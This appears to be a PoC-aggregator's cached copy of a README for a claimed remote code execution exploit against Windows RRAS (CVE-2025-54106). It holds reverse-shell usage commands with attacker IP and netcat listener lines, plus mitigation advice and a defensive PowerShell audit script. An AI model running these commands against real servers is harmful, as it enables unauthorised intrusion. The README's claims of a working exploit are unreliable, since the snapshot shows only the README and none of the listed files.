PoC details: ec70fad53bdc8460ea9641f8080b32ed9bbb08a7

Source
Related vulnerability
Title: Microsoft Windows Routing and Remote Access Service input validation error vulnerability (CVE-2025-54106)
Description: Microsoft Windows Routing and Remote Access Service is a network service from Microsoft (United States) that provides network routing, virtual private network (VPN) and dial-up connectivity. Microsoft Windows Routing and Remote Access Service contains an input validation error vulnerability. An attacker can exploit it to execute code remotely. The following products and versions are affected: Windows Server 2019, Windows Server 2019 (Server Core inst
Introduction
# CVE-2025-54106 - Windows RRAS Integer Overflow Exploit

## Overview

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54106, a critical integer overflow vulnerability in the Routing and Remote Access Service (RRAS) component of Microsoft Windows Server versions from 2012 R2 up to 2022 23H2. The vulnerability allows remote code execution (RCE) without authentication by sending specially crafted network packets that trigger an integer wraparound during packet processing.

The exploit targets the RRAS service, typically exposed on ports like 1701 (L2TP), 1723 (PPTP), or others depending on configuration. It exploits an integer overflow in the handling of routing table entries or connection parameters, leading to memory corruption and arbitrary code execution in SYSTEM context.

This PoC is for educational and security research purposes only. It demonstrates the vulnerability in a controlled lab environment. Do not use on production systems or without permission.

## Requirements

- Python 3.10 or higher
- Access to a vulnerable Windows Server instance with RRAS enabled and exposed
- Attacker machine on the same network or with remote access to the target
- Tested on:
  - Windows Server 2022 23H2 (Build 20348.2527)
  - Windows Server 2019 (Build 17763.5936)


## Usage

The main exploit script is `exploit.py`. It crafts and sends malformed packets to trigger the overflow.

### Basic Command
```
python exploit.py --target <TARGET_IP> --port <PORT> --payload <PAYLOAD_TYPE> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
```

- `--target`: IP address of the vulnerable RRAS server.
- `--port`: Port where RRAS is listening (default: 1701 for L2TP).
- `--payload`: Type of payload.
- `--lhost`: Attacker's IP for reverse connections.
- `--lport`: Attacker's listening port (default: 4444).
- `--verbose`: Enable detailed output (optional).

### Example

**Reverse Shell:**

```
python exploit.py --target 192.168.1.100 --port 1701 --payload reverse_shell --lhost 192.168.1.50 --lport 4444
```

Start a listener on your machine (e.g., `nc -lvnp 4444`) before running.

### Payload Customization
Custom payloads can be added in the `payloads/` directory. See `payloads/reverse_shell.bin` for an example.


### Mitigation
- Apply the official patch from Microsoft: [MSRC Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54106).
- Disable RRAS if not needed.
- Use firewalls to restrict access to RRAS ports.
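A defender-side check for the second and third mitigation points, added here as an example and not part of this repository: it reports whether the RRAS service (Windows service name `RemoteAccess`) is installed and running, whether the ports named above (UDP 1701 for L2TP, TCP 1723 for PPTP) are actually bound, and which enabled inbound firewall rules explicitly allow them. Only standard Windows cmdlets are used; the port list is taken from this page.

```powershell
# Added example: audit RRAS exposure on a Windows Server host (run in an elevated PowerShell).
# Ports are those named on this page (UDP 1701 L2TP, TCP 1723 PPTP); RemoteAccess is the RRAS service name.
$svc = Get-Service -Name RemoteAccess -ErrorAction SilentlyContinue
if ($null -eq $svc) {
    Write-Output "RRAS (RemoteAccess) service is not installed"
} else {
    Write-Output ("RRAS (RemoteAccess) status: {0}, start type: {1}" -f $svc.Status, $svc.StartType)
}

# Is anything currently bound to the RRAS ports?
$udp = Get-NetUDPEndpoint -LocalPort 1701 -ErrorAction SilentlyContinue
$tcp = Get-NetTCPConnection -LocalPort 1723 -State Listen -ErrorAction SilentlyContinue
Write-Output ("UDP 1701 (L2TP) bound: {0}" -f [bool]$udp)
Write-Output ("TCP 1723 (PPTP) listening: {0}" -f [bool]$tcp)

# Enabled inbound allow rules that name either port explicitly.
# Rules with LocalPort 'Any' or port ranges are not matched here; review those separately.
$ports = @('1701', '1723')
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow -ErrorAction SilentlyContinue |
    ForEach-Object {
        $rule   = $_
        $filter = $rule | Get-NetFirewallPortFilter
        $local  = @($filter.LocalPort)
        if ($local | Where-Object { $ports -contains $_ }) {
            [pscustomobject]@{
                Rule      = $rule.DisplayName
                Profile   = $rule.Profile
                Protocol  = $filter.Protocol
                LocalPort = ($local -join ',')
            }
        }
    } | Format-Table -AutoSize
```

If RRAS is not needed, a running service or a matching allow rule in this output is the exposure the mitigation list tells you to remove.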

## Files in Folder

- `exploit.py`: Main exploit script.
- `requirements.txt`: Python dependencies.
- `payloads/`: Directory for shellcode and binaries (e.g., `reverse_shell.bin`).
- `docs/`: Additional notes on ROP chains and memory layouts for different server versions.


## Disclaimer

This tool is intended for security professionals and researchers. The author assumes no liability for any damages. Use responsibly and ethically.


For any inquiries, please email me at: eviedejesu803@gmail.com
File snapshot

```
[4.0K] /data/pocs/ec70fad53bdc8460ea9641f8080b32ed9bbb08a7
└── [2.9K] README.md

0 directories, 1 file
```

Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the PoC through the source link.
    2. If the source has been removed or is unreachable, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.